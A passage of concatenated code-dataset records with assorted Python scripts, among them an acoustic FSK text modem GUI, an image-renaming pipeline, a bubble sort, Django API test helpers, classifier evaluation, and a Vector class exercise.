sio\nfrom PyQt5.QtCore import QThread\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nimport pyaudio\nfrom scipy.io.wavfile import write\nimport sounddevice as sd\nimport time\nimport scipy.io.wavfile as wav\nimport soundfile as sf\nfrom Messages import msgButtonClick, showDialog\nfrom scipy import signal\nimport operator\nimport csv\nimport math\nform_class = uic.loadUiType(\"gui_for_translate.ui\")[0]\n\nsampling_rate = 48000\nsymbol_duration = 0.025\nf = 4000\nN = sampling_rate * symbol_duration\nTs = 1 / sampling_rate\nFILENAME = \"tmp.wav\"\npreamble = '01010101010101010101'\n\npreamble_signal = ','.join(list(preamble))\npreamble_time_signal = N * len(preamble) / sampling_rate\npreamble_t = np.arange(0, preamble_time_signal, Ts)\npreamble_np_signal = np.fromstring(preamble_signal, dtype='int', sep=',')\npreamble_sample = np.repeat(preamble_np_signal, N)\npreamble_y = np.sin(2 * np.pi * (f + preamble_sample * 2000) * preamble_t)\n\n\ndef encode_c(s):\n return ''.join([bin(ord(c)).replace('0b', '') for c in s])\n\n\ndef decode_c(s):\n return ''.join([chr(i) for i in [int(b, 2) for b in s.split(' ')]])\n\n\nclass ThreadClass(QThread):\n def __init__(self):\n super().__init__()\n\n def run(self):\n global flag\n flag = 0\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n frames = []\n\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=sampling_rate,\n input=True,\n output=True,\n frames_per_buffer=int(N))\n\n while 1:\n if flag == 0:\n data = stream.read(int(N))\n frames.append(data)\n else:\n break\n stream.stop_stream()\n stream.close()\n p.terminate()\n wf = wave.open(FILENAME, \"wb\")\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(sampling_rate)\n wf.writeframes(b\"\".join(frames))\n wf.close()\n\n\n\nclass WindowClass(QMainWindow, form_class):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.encode_button.clicked.connect(self.encode)\n #self.decode_button.clicked.connect(self.decode)\n self.start_record.clicked.connect(self.recording)\n self.stop_record.clicked.connect(self.stop_recording)\n self.threadclass = ThreadClass()\n\n\n\n\n\n def decode(self):\n display_result = ''\n filtedData = []\n current_length = 0\n current_data = []\n data = []\n flag = 0\n impulse_fft = []\n impulse_fft_tmp = []\n bin = []\n real = []\n self.decode_text.setPlainText(''.join(real))\n\n\n bandpass1 = 3000\n bandpass2 = 7000\n read_signal, fs = sf.read(FILENAME)\n\n wn1 = 2.0 * bandpass1 / sampling_rate\n wn2 = 2.0 * bandpass2 / sampling_rate\n b, a = signal.butter(8, [wn1, wn2], 'bandpass') # 범위를 조금 더 넓게 해야할\n filtedData = signal.filtfilt(b, a, read_signal) # data为要过滤的信号\n\n current_length = len(filtedData)\n current_data = filtedData\n while 1:\n once_check = 0\n corr = []\n corr_index = dict()\n\n\n print('finding preamble')\n print('current_data length',len(current_data))\n for i in range(current_length - len(preamble_y)):\n corr.append(np.corrcoef(current_data[i:i + len(preamble_y)], preamble_y)[0, 1])\n if once_check + 24000 == i and once_check != 0:\n print('corr 찾는거 ')\n break\n\n if corr[i] > 0.5:\n if once_check == 0:\n once_check = i\n print('once_check',once_check)\n\n corr_index[i] = corr[i]\n\n\n\n try:\n flag = max(corr_index.items(), key=operator.itemgetter(1))[0]\n except:\n print('decode 结束')\n break\n\n\n print(flag)\n data = current_data[flag + len(preamble_y):flag + len(preamble_y)+60000]\n\n target_fre = 6000\n n = len(data)\n window = 600\n impulse_fft = np.zeros(n)\n for i in range(int(n - window)):\n y = np.fft.fft(data[i:i + int(window) - 1])\n y = np.abs(y)\n index_impulse = round(target_fre / sampling_rate * window)\n impulse_fft[i] = max(y[index_impulse - 2:index_impulse + 2])\n\n sliding_window = 5\n impulse_fft_tmp = impulse_fft\n for i in range(1 + sliding_window, n - sliding_window):\n impulse_fft_tmp[i] = np.mean(impulse_fft[i - sliding_window:i + sliding_window])\n impulse_fft = impulse_fft_tmp\n\n\n #\n #\n # position_impulse = [];\n # half_window = 800;\n #\n #\n #\n # for i in range(n-half_window*2):\n # if impulse_fft[i+half_window] > 90 and impulse_fft[i+half_window] == max(impulse_fft[i - half_window: i + half_window]):\n # position_impulse.append(i)\n # message_bin = np.zeros(230400)\n # for i in range(len(position_impulse)):\n # message_bin[math.ceil(position_impulse / 4800)] = 1\n # real_message_start = 1\n # last_one_index = 1\n # for i in range(3):\n # if message_bin[i] == 1:\n # last_one_index = i\n #\n # real_message_start = last_one_index + 1\n #\n # real_message_bin = message_bin[real_message_start:230400]\n #\n # curr_package_index = 0\n # curr_bin_index = 1\n # real_message_bin = np.matrix.H(real_message_bin)\n\n\n plus = 0\n adjust = 0\n count =0\n while 1:\n decode_length = ''\n if adjust == 1:\n plus += 0.1\n print(plus)\n for i in range(8):\n\n bin = np.mean(impulse_fft[i * 1200:(i + 1) * 1200])\n bin += plus\n print(bin)\n if bin < 5:\n decode_length = decode_length + '0'\n else:\n decode_length = decode_length + '1'\n\n print(decode_length)\n decode_payload_length = int(decode_length, 2)\n count += 1\n if count == 40:\n break\n if decode_payload_length != 35:\n adjust = 1\n else:\n break\n\n if count == 40:\n decode_length = ''\n\n for i in range(8):\n bin = np.mean(impulse_fft[i * 1200:(i + 1) * 1200])\n print(bin)\n if bin < 3:\n decode_length = decode_length + '0'\n else:\n decode_length = decode_length + '1'\n\n print(decode_length)\n decode_payload_length = int(decode_length, 2)\n adjust = 0\n\n decode_payload = ''\n for i in range(decode_payload_length):\n bin = np.mean(impulse_fft[(i + 8) * 1200:(i + 1 + 8) * 1200])\n\n if bin < 3:\n decode_payload = decode_payload + '0'\n else:\n decode_payload = decode_payload + '1'\n print(bin)\n else:\n decode_payload = ''\n for i in range(decode_payload_length):\n bin = np.mean(impulse_fft[(i + 8) * 1200:(i + 1 + 8) * 1200])\n\n if adjust == 1:\n bin += plus\n if bin < 5:\n decode_payload = decode_payload + '0'\n else:\n decode_payload = decode_payload + '1'\n print(bin)\n\n print(decode_payload)\n while 1:\n if len(decode_payload) % 7 != 0:\n decode_payload = decode_payload + '0'\n else:\n break\n\n print(1200*(int(decode_length,2)+8))\n current_data = current_data[1200*(int(decode_length,2)+8+20)+flag:len(current_data)]\n current_length = len(current_data)\n display_result = display_result + decode_payload\n\n\n real = []\n for i in range(int(len(display_result) / 7)):\n real.append(decode_c(display_result[i * 7:(i + 1) * 7]))\n print(real)\n self.decode_text.setPlainText(''.join(real))\n\n print('result:',''.join(real))\n global start\n cost_time = \"time:\" + str(time.time() - start) + '\\n'\n decode_payload = decode_payload + '\\n'\n\n file = open(\"result_translate.txt\", 'w')\n file.write(cost_time)\n file.write(decode_payload)\n file.write(''.join(real))\n file.close()\n\n def recording(self):\n global start\n start = time.time()\n\n print('recording....')\n self.threadclass.start()\n\n def stop_recording(self):\n global flag\n flag = 1\n print('stop!!!')\n time.sleep(1)\n self.decode()\n def encode(self):\n input_text = encode_c(self.encode_text.toPlainText())\n if input_text == '':\n msgBox = QMessageBox()\n msgBox.setIcon(QMessageBox.Information)\n msgBox.setText(\"不能是空的\")\n msgBox.setWindowTitle(\"系统警告\")\n msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n msgBox.buttonClicked.connect(msgButtonClick)\n returnValue = msgBox.exec()\n if returnValue == QMessageBox.Ok:\n return\n length = 35\n temp = [input_text[i:i + length] for i in range(0, len(input_text), length)]\n for i in range(len(temp)):\n length_payload = str(format(len(temp[i]), 'b')) # 7자리\n if len(length_payload) < 8:\n length_payload = length_payload.zfill(8)\n print(temp[i])\n total = preamble + length_payload + temp[i]\n signal = ','.join(list(total))\n time_signal = N * len(total) / sampling_rate\n t = np.arange(0, time_signal, Ts)\n np_signal = np.fromstring(signal, dtype='int', sep=',')\n sample = np.repeat(np_signal, N)\n if (len(t) % 10) != 0:\n t = t[:len(t) - 1]\n y = np.sin(2 * np.pi * (f + sample * 2000) * t)\n write('first.wav', sampling_rate, y)\n samplerate, data = sio.wavfile.read('first.wav')\n sd.play(data, samplerate)\n time.sleep(time_signal + 1)\n\n def window(self):\n app = QApplication(sys.argv)\n win = QWidget()\n button1 = QPushButton(win)\n button1.setText(\"Show dialog!\")\n button1.move(50, 50)\n button1.clicked.connect(showDialog)\n win.setWindowTitle(\"Click button\")\n win.show()\n sys.exit(app.exec_())\n\n def msgButtonClick(self, i):\n print(\"Button clicked is:\", i.text())\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n myWindow = WindowClass()\n\n myWindow.show()\n\n app.exec_()\n\n\n","sub_path":"传输系统性能测试/translater.py","file_name":"translater.py","file_ext":"py","file_size_in_byte":11614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"449331027","text":"\"\"\"\nPipeline practice to rename image files.\n\"\"\"\n\nimport os\nimport cv2\n\n\ndef walk_to_level(path, level=None):\n if level is None:\n yield from os.walk(path)\n return\n\n path = path.rstrip(os.path.sep)\n num_sep = path.count(os.path.sep)\n for root, dirs, files in os.walk(path):\n yield root, dirs, files\n num_sep_this = root.count(os.path.sep)\n if num_sep + level <= num_sep_this:\n # When some directory on or below the desired level is found, all\n # of its subdirs are removed from the list of subdirs to search next.\n # So they won't be walked.\n del dirs[:]\n\n\ndef list_files(path, valid_exts=None, level=None, contains=None):\n \"\"\"Loop over the input directory structure.\"\"\"\n for (root_dir, dir_names, filenames) in walk_to_level(path, level):\n for filename in sorted(filenames):\n # ignore the file if not contains the string\n if contains is not None and contains not in filename:\n continue\n\n # Determine the file extension of the current file\n ext = filename[filename.rfind(\".\") :].lower()\n if valid_exts and ext.endswith(valid_exts):\n # Construct the path to the file and yield it\n file = os.path.join(root_dir, filename)\n yield file\n\n\nclass Pipeline:\n \"\"\"Abstract base class for building pipelines.\"\"\"\n\n def __init__(self):\n self.source = None\n\n def __iter__(self):\n return self.generator()\n\n def generator(self):\n while self.has_next():\n data = next(self.source) if self.source else {}\n if self.filter(data):\n yield self.map(data)\n\n def __or__(self, other):\n other.source = self.generator()\n return other\n\n def filter(self, data):\n return True\n\n def map(self, data):\n return data\n\n def has_next(self):\n return True\n\n\nclass RenameImages(Pipeline):\n def __init__(self, src, valid_exts=(\".jpg\", \".png\")):\n self.src = src\n self.valid_exts = valid_exts\n\n super(RenameImages, self).__init__()\n\n def generator(self):\n source = list_files(self.src, self.valid_exts)\n\n while self.has_next():\n old = next(source)\n\n old_path, old_ext = os.path.splitext(old)\n old_name = old_path.split(\"/\")[-1]\n\n class_name = old_name.split()[0]\n img_id = old_name.split()[2].zfill(4)\n new_name = f\"{class_name}-{img_id}\"\n\n new_path = os.path.join(self.src, new_name)\n new = f\"{new_path}{old_ext}\"\n\n print(f\"{old}\")\n print(f\"{new}\")\n data = new_path\n\n os.rename(old, new_path)\n\n if self.filter(data):\n yield self.map(data)\n\n\n# class Printer(Pipeline):\n# def map(self, value):\n# print(value)\n# return value\n\n\ndef main(img_path):\n rename = RenameImages(img_path)\n # printer = Printer()\n\n pipeline = rename\n\n for i in pipeline:\n pass\n\n\nif __name__ == \"__main__\":\n main(\"/Users/Tobias/workshop/buildbox/forecut/assets_/images\")\n","sub_path":"scripts/file_rename_pipe.py","file_name":"file_rename_pipe.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605138438","text":"nums = [6, 5, 3, 1, 8, 7, 2, 4]\n# nums = [1, 2, 3, 4, 5, 6, 7, 9, 8]\n# 比较次数\ncount = 0\nj = 0\nwhile j < len(nums) - 1:\n # 在每一趟里都定义一个flag\n flag = True # 假设该趟没有发生交换\n i = 0\n while i < len(nums) - 1 - j:\n count += 1\n if nums[i] > nums[i + 1]:\n # 只要交换了,假设就不成立\n flag = False\n nums[i], nums[i + 1] = nums[i + 1], nums[i]\n i += 1\n if flag:\n # 这一趟走完以后,flag依然是True,说明这一趟没有进行过交换数据\n break\n j += 1\nprint(nums)\nprint(count)\n","sub_path":"study01/day04/02-冒泡排序优化.py","file_name":"02-冒泡排序优化.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"511276372","text":"from base64 import b64encode\n\nfrom django.contrib.auth.models import User\n\n\nadmin_test_credentials = ('admin1', 'admin@taverna.com', 'qwerty123',)\nnormal_user_credentials = ('user1', 'user1@taverna.com', 'qwerty123',)\nendpoint = '/api'\n\n\ndef obtain_api_key(client):\n credentials = '{}:{}'.format(\n admin_test_credentials[0],\n admin_test_credentials[2]\n )\n b64_encoded_credentials = b64encode(credentials.encode('utf-8'))\n return client.post(\n '/api/api_key',\n **{'HTTP_AUTHORIZATION': 'Basic %s' % b64_encoded_credentials.decode('utf-8')}\n ).json()['api_key']\n\n\ndef create_admin_account():\n return User.objects.create_superuser(*admin_test_credentials)\n\n\ndef create_normal_user_acount():\n return User.objects.create_user(*normal_user_credentials)\n\n\ndef make_request(client, query, method='GET'):\n header = {\n 'HTTP_X_TAVERNATOKEN': obtain_api_key(client)\n }\n\n if method == 'GET':\n return client.get(endpoint, data={'query': query}, **header).json()\n\n if method == 'POST':\n return client.post(endpoint, data={'query': query}, **header).json()\n","sub_path":"app/api/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"599533390","text":"# -*- coding: UTF-8 -*-\n'''\n@author: xuqiang\n'''\nimport tensorflow as tf\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport glob\nfrom tensorflow.python.framework.graph_util import convert_variables_to_constants\n\n# nameAndPositon = {'orange':'0','apple':'1','one':'2','zebra':'3','chinese':'5','oil':'6','many':'7'}\n# print(nameAndPositon.keys())\n\n'''\n提取文件名中,,,\n'''\n# name = \"oiltochinese-15-15-test\"\n# values = name.split(\"to\")\n# first = values[0]\n# second = values[1].split(\"-\")[0]\n# print(first)\n# print(second)\n# print(nameAndPositon[first])\n\ndef getOneImgClassifyProb(sess,imageToTensorPath):\n # chkName = tf.train.latest_checkpoint('E:/tensorflow/selfmodelclassify/')\n # saver = tf.train.import_meta_graph(chkName + '.meta')\n # saver.restore(sess, tf.train.latest_checkpoint('E:/tensorflow/selfmodelclassify/'))\n with open(imageToTensorPath,'r') as bottleneck_file:\n bottleneck_string = bottleneck_file.read()\n bottleneck_values = [float(x) for x in bottleneck_string.strip().split(',')]\n bottleneck_values_reshape = np.reshape(bottleneck_values, [-1, 2048])\n graph = tf.get_default_graph()\n input = graph.get_tensor_by_name(\"BottleneckInputPlaceholder:0\")\n w1 = graph.get_tensor_by_name(\"final_training_ops/op_to_prob:0\")\n feed_dict = {input: bottleneck_values_reshape}\n prob = sess.run(w1, feed_dict)\n return prob\n\ndef getListImgClassifyProb(sess,imageList):\n listLen = len(imageList)\n totalImgProb = np.zeros(8)\n for imgPath in imageList:\n oneImgProb = getOneImgClassifyProb(sess,imgPath)\n totalImgProb = np.add(totalImgProb,oneImgProb)\n return np.divide(totalImgProb,listLen)\n\ndef main(input_data_tensor_valuation_path):\n nameAndPositon = {'orange': '0', 'apple': '1', 'one': '2', 'zebra': '3','horse':'4','chinese': '5', 'oil': '6', 'many': '7'}\n sub_dirs = [x[0] for x in os.walk(input_data_tensor_valuation_path)]\n is_root_dir = True\n for sub_dir in sub_dirs:\n if is_root_dir:\n is_root_dir = False\n continue\n base_name = os.path.basename(sub_dir)\n file_name_apart = base_name.split(\"to\")\n first_name = file_name_apart[0]\n second_name = file_name_apart[1].split(\"-\")[0]\n prefixs = ['fakeA','fakeB']\n file_list = {}\n for prefix in prefixs:\n file_glob = os.path.join(input_data_tensor_valuation_path,base_name,prefix+'*')\n file_list[prefix] = glob.glob(file_glob)\n\n fakeA_img_list = file_list['fakeA']\n fakeB_img_list = file_list['fakeB']\n print(base_name + \"文件夹底下共\" + str(len(fakeA_img_list)+len(fakeB_img_list))+\"张图像\")\n\n with tf.Session() as sess:\n chkName = tf.train.latest_checkpoint('E:/tensorflow/selfmodelclassify/')\n saver = tf.train.import_meta_graph(chkName + '.meta')\n saver.restore(sess, tf.train.latest_checkpoint('E:/tensorflow/selfmodelclassify/'))\n fakeA_img_average_prob = getListImgClassifyProb(sess,fakeA_img_list)\n fakeB_img_average_prob = getListImgClassifyProb(sess,fakeB_img_list)\n # print(fakeA_img_average_prob)\n # print(fakeB_img_average_prob)\n positionA = int(nameAndPositon[first_name])\n positionB = int(nameAndPositon[second_name])\n print(base_name+\"文件中fakeA的平均准确率为:\"+str(fakeA_img_average_prob[0][positionB]))\n print(base_name+\"文件中fakeB的平均准确率为:\"+str(fakeB_img_average_prob[0][positionA]))\n print(\"++++++++++++++++++++++++++++++++++\")\n with open(input_data_tensor_valuation_path+'avgAccOutput.txt','a') as f:\n f.write(base_name+\"文件中fakeA的平均准确率为:\"+str(fakeA_img_average_prob[0][positionB])+\"\\n\"+\n base_name + \"文件中fakeB的平均准确率为:\" + str(fakeB_img_average_prob[0][positionA])+\"\\n\\n\")\n\n\nif __name__ == \"__main__\":\n # list1 = np.zeros(8)\n # list2 = [2.83964584e-03,7.56550930e-04,6.08784103e-06,3.81935941e-04,1.47359213e-04,7.49921858e-01,2.45923772e-01,2.27466589e-05]\n # print(list1)\n # addTo = np.add(list1, list2)\n # print(addTo)\n # print(np.divide(addTo,2))\n\n # input_data_tensor_valuation_path = 'F:/converImgtoTensor/tensor-valuation/'\n input_data_tensor_valuation_path = 'F:/converImgtoTensor/adding/tensor-valuation/'\n main(input_data_tensor_valuation_path)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"src/demo/section6-cnn/fineTune/calculateAverageOfClassifyAcc-original.py","file_name":"calculateAverageOfClassifyAcc-original.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"224098246","text":"# Copyright (C) 2020 Simon Biggs\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport pathlib\n\nimport tomlkit\n\nPYPROJECT_TOML_PATH = (\n pathlib.Path(__file__).resolve().parent.parent.joinpath(\"pyproject.toml\")\n)\n\n\ndef main():\n with open(PYPROJECT_TOML_PATH) as f:\n pyproject_contents = tomlkit.loads(f.read())\n\n deps = pyproject_contents[\"tool\"][\"poetry\"][\"dependencies\"]\n\n extras = {}\n\n for key in deps:\n value = deps[key]\n comment = value.trivia.comment\n\n if comment.startswith(\"# groups\"):\n split = comment.split(\"=\")\n assert len(split) == 2\n groups = json.loads(split[-1])\n\n for group in groups:\n try:\n extras[group].append(key)\n except KeyError:\n extras[group] = [key]\n\n pyproject_contents[\"tool\"][\"poetry\"][\"extras\"] = extras\n\n with open(PYPROJECT_TOML_PATH, \"w\") as f:\n f.write(tomlkit.dumps(pyproject_contents))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/propagate-extras.py","file_name":"propagate-extras.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"489300890","text":"import numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import KFold\nfrom sklearn import svm\n\n\ndef load_csv_data(filename):\n data = []\n labels = []\n datafile = open(filename)\n for line in datafile:\n fields = line.strip().split(',')\n data.append([float(field) for field in fields[:-1]])\n labels.append(int(fields[-1]))\n data = np.array(data)\n labels = np.array(labels)\n return data, labels\n\n\ndef judge_zero(feature, n):\n for i in range(n):\n if feature[i] == 1:\n return 0\n return 1\n\ndef gen_feat_data(feature, n, data):\n if judge_zero(feature, n) == 1: # if all bits are 0, then convert to all 1\n return data\n new_data = []\n nd = len(data)\n for i in range(nd):\n temp_data = []\n for j in range(n):\n if feature[j] == 1:\n temp_data.append(data[i][j])\n new_data.append(temp_data)\n new_data = np.array(new_data)\n return new_data\n\n\ndef accuracy(test_labels, pred_labels):\n n = len(test_labels)\n correct = 0\n for i in range(n):\n if test_labels[i] == pred_labels[i]:\n correct += 1\n return float(correct) / n\n\n\ndef cal_fitvalue(data, labels, op): # op=1,3-knn;op=2,5-knn\n if op == 1:\n model = KNeighborsClassifier(n_neighbors = 3)\n elif op == 2:\n model = KNeighborsClassifier(n_neighbors = 5)\n elif op == 3:\n model = svm.SVC(kernel='rbf', gamma='auto')\n elif op == 4:\n model = KNeighborsClassifier(n_neighbors = 1)\n kf = KFold(n_splits = 10, shuffle = True)\n result_set = [(model.fit(data[train], labels[train]).predict(data[test]), test) for train, test in kf.split(data)]\n score = [accuracy(labels[result[1]], result[0]) for result in result_set]\n sum = 0.\n for i in range(3):\n sum += score[i]\n res_score = sum / 3\n return res_score\n","sub_path":"Algorithm/FSFOA/classify_model.py","file_name":"classify_model.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18110148","text":"# -*- coding: utf-8 -*-\n\nname = \"ctl\"\n\nversion = \"1.5.2\"\n\ndescription = \"Ampas CTL\"\n\nrequires = [\n \"acescontainer\",\n \"openexr-2.2.0\"\n]\n\ntools = [\n \"ctlrender\",\n \"exr_ctl_exr\",\n \"exrdpx\"\n]\n\ndef commands():\n env.PATH.append(\"{root}/bin\")\n env.LD_LIBRARY_PATH.append(\"{root}/lib\")\n","sub_path":"ctl/1.5.2/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"226558973","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: Alfons\n@contact: alfons_xh@163.com\n@file: 13-01-Vector.py\n@time: 18-5-15 下午10:05\n@version: v1.0 \n\"\"\"\n\nfrom array import array\nimport math\nimport reprlib\nimport numbers\nimport operator\nimport functools\nimport itertools\nimport traceback\n\n\nclass Vector:\n typecode = 'd'\n\n def __init__(self, components):\n self.__components = array(self.typecode, components)\n\n def __len__(self):\n return len(self.__components)\n\n def __getitem__(self, index):\n cls = type(self)\n if isinstance(index, slice):\n return cls(self.__components[index])\n elif isinstance(index, numbers.Integral):\n return self.__components[index]\n else:\n raise TypeError(\"{cls.__name__} indices must be integers\".format(cls=cls))\n\n def __iter__(self):\n return iter(self.__components)\n\n def __repr__(self):\n component_str = reprlib.repr(self.__components)\n component_str = component_str[component_str.find('['):-1] # 也可使用list转换,但代价太大\n return \"Vector({})\".format(component_str)\n\n def __str__(self):\n return str(tuple(self))\n\n def __bytes__(self):\n return bytes([ord(self.typecode)]) + bytes(self.__components)\n\n def __eq__(self, other): # 比较方案改进,适用于超长的数组\n # return tuple(self) == tuple(other)\n return len(self) == len(other) and all(\n a == b for a, b in zip(self, other)) # zip返回两个迭代, all返回只有所有比较都为True,才返回True\n\n def __hash__(self):\n hashes = (hash(x) for x in self) # 使用了生成器,内部有yield产生参数\n return functools.reduce(operator.xor, hashes, 0)\n\n def __abs__(self):\n return math.sqrt(sum(x * x for x in self))\n\n def __bool__(self):\n return bool(abs(self))\n\n @classmethod\n def frombytes(cls, octets):\n typecode = chr(octets[0])\n memv = memoryview(octets[1:]).cast(typecode)\n return cls(memv)\n\n shortcut_names = \"xyzt\"\n\n def __getattr__(self, name): # vector 类能够使用 vector.x vector.y 来获取对应位置的值\n cls = type(self) # type 返回类中的参数\n if len(name) == 1:\n pos = cls.shortcut_names.find(name)\n if 0 <= pos < len(self.__components):\n return self.__components[pos]\n raise AttributeError(\"{.__name__} object has no attribute {}\".format(cls, name))\n\n def __setattr__(self, name, value): # 设置 vector 为只读属性\n cls = type(self)\n if len(name) == 1:\n if name in cls.shortcut_names:\n error = \"readonly attribute {attr_name!r}\"\n elif name.islower():\n error = \"can't set 'a' to 'z' in {cls_name!r}\"\n else:\n error = \"\"\n\n if error:\n raise AttributeError(error.format(attr_name=name, cls_name=cls.__name__))\n super().__setattr__(name, value)\n\n def angle(self, n):\n r = math.sqrt(sum(x * x for x in self[n:]))\n a = math.atan2(r, self[n - 1])\n if (n == len(self) - 1) and (self[-1] < 0):\n return math.pi * 2 - a\n else:\n return a\n\n def angles(self):\n return (self.angle(n) for n in range(1, len(self)))\n\n def __format__(self, format_spec=\"\"):\n if format_spec.endswith('h'):\n format_spec = format_spec[:-1]\n coords = itertools.chain([abs(self)], self.angles())\n outfm = \"<{}>\"\n else:\n coords = self\n outfm = \"({})\"\n components = (format(f, format_spec) for f in coords)\n return outfm.format(\",\".join(components))\n\n\nvector_a = Vector([3.0, 4.0])\nprint(\"vector_a:\", vector_a)\n\nvector_b = Vector([8, 9, 10])\nprint(\"vector_b:\", vector_b)\n\nprint(\"\\n重载+运算符前:\")\n\ntry:\n vector_c = vector_a + vector_b\nexcept:\n traceback.print_exc()\n\nprint(\"\\n重载+运算符后:\")\n\n\ndef add(self, other):\n try:\n pairs = itertools.zip_longest(self, other, fillvalue=0.0)\n return Vector(a + b for a, b in pairs)\n except TypeError:\n return NotImplemented\n\n\ndef addr(self, other):\n return self + other\n\n\nVector.__add__ = add\nVector.__radd__ = addr\n\nprint(\"vector_a + vector_b = \", vector_a + vector_b)\nprint(\"vector_a + [1,2,3,4,5] = \", vector_a + [1, 2, 3, 4, 5])\nprint(\"[1,2,3,4,5] + vector_a = \", [1, 2, 3, 4, 5] + vector_a)\n# print(\"'ABC' + vector_a = \", 'ABC' + vector_a)\n\nprint(\"\\n重载*运算符后:\")\n\nimport numbers\n\n\ndef mul(self, scalar):\n if isinstance(scalar, numbers.Real):\n return Vector(a * scalar for a in self)\n else:\n return NotImplemented\n\n\ndef rmul(self, scalar):\n return self * scalar\n\n\nVector.__mul__ = mul\nVector.__rmul__ = rmul\n\nprint(\"vector_a * 7 = \", vector_a * 7)\nprint(\"7 * vector_a = \", 7 * vector_a)\n\nfrom fractions import Fraction\ni = Fraction(1, 3)\nj = 1/3\nprint(\"vector_a * i = \", vector_a * i)\nprint(\"vector_a * j = \", vector_a * j)\npass\n","sub_path":"13-Overload/13-01-Vector.py","file_name":"13-01-Vector.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"157094075","text":"#!/usr/bin/env python3\nfrom linenotipy import Line\nimport subprocess\nfrom subprocess import PIPE\n\n\nclass Bot(object):\n def __init__(self):\n self.line = Line(token=\"DVxKcN9dg0ecy9ETJtRpVHZr2Uouw1IyRDQtfxl3Ypk\")\n\n def sender(self):\n self.line.post(message=\"finish experimt\")\n self.stopper()\n\n def stopper(self):\n command = \"sudo service cron start\"\n proc = subprocess.Popen(\n command, shell=True, stderr=PIPE, stdout=PIPE, text=True)\n proc.communicate()[0]\n\n\ndef switch():\n command = \"ps -aux | grep less | wc -l\"\n proc = subprocess.Popen(\n command, shell=True, stderr=PIPE, stdout=PIPE, text=True)\n res = proc.communicate()\n return res[0].strip()\n\n\ndef main():\n sw = int(switch())\n bot = Bot()\n bot.sender() if sw == 2 else None\n\n\nmain()\n","sub_path":"command/line-sender.py","file_name":"line-sender.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"606641996","text":"# coding=utf-8\n# ------------------添加root_path\nimport os\nimport sys\n\ncurrent_Path = os.path.abspath(os.path.dirname(__file__))\nroot_path = os.path.split(current_Path)[0]\n__root_path = root_path.split(sep=\"context\")[0]\n__root_path_1 = __root_path + \"context\" + os.sep\n__root_path_2 = __root_path + \"doc\" + os.sep\nprint(__root_path_1, \"========\", __root_path_2)\nsys.path.append(__root_path_1)\nsys.path.append(__root_path_2)\n# ------------------\nfrom lawcase.master import redis_case_lawyer_task_master\nimport logging\nimport time\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S', filemode='a', )\nif __name__ == \"__main__\":\n while True:\n redis_case_lawyer_task_master(batch_num=10)\n logging.info(\"=*= 休眠5秒 =*=\")\n time.sleep(5)\n","sub_path":"lawyer/case/context/lawcase/master/case_lawyer_master.py","file_name":"case_lawyer_master.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"478413058","text":"import sys\nimport tempfile\nimport numpy as np\nfrom copy import deepcopy\nfrom amplpy import AMPL\nfrom sweep.sweep import sweep\nfrom clarke_wright.clarke_wright import clarke_wright\nfrom collections import namedtuple\nfrom enum import Enum\n\nclass Model(object):\n\tResult = namedtuple(\"Result\", \"carId cargo sales road path income totalIncome capacityUsed\")\n\n\tclass AlgorithmType(Enum):\n\t\tSweep = 1\n\t\tClarkeWright = 2\n\n\tdef __init__(self, dataDirectory, verbose=False):\n\t\tself.data = self.load_data(dataDirectory)\n\t\tprint(\"Loaded data: {0}\".format(self.data))\n\t\tself.verbose = verbose\n\n\tdef run(self, algorithmType):\n\t\tif algorithmType is Model.AlgorithmType.Sweep:\n\t\t\tresult = self.run_sweep(self.data)\n\t\telif algorithmType is Model.AlgorithmType.ClarkeWright:\n\t\t\tresult = 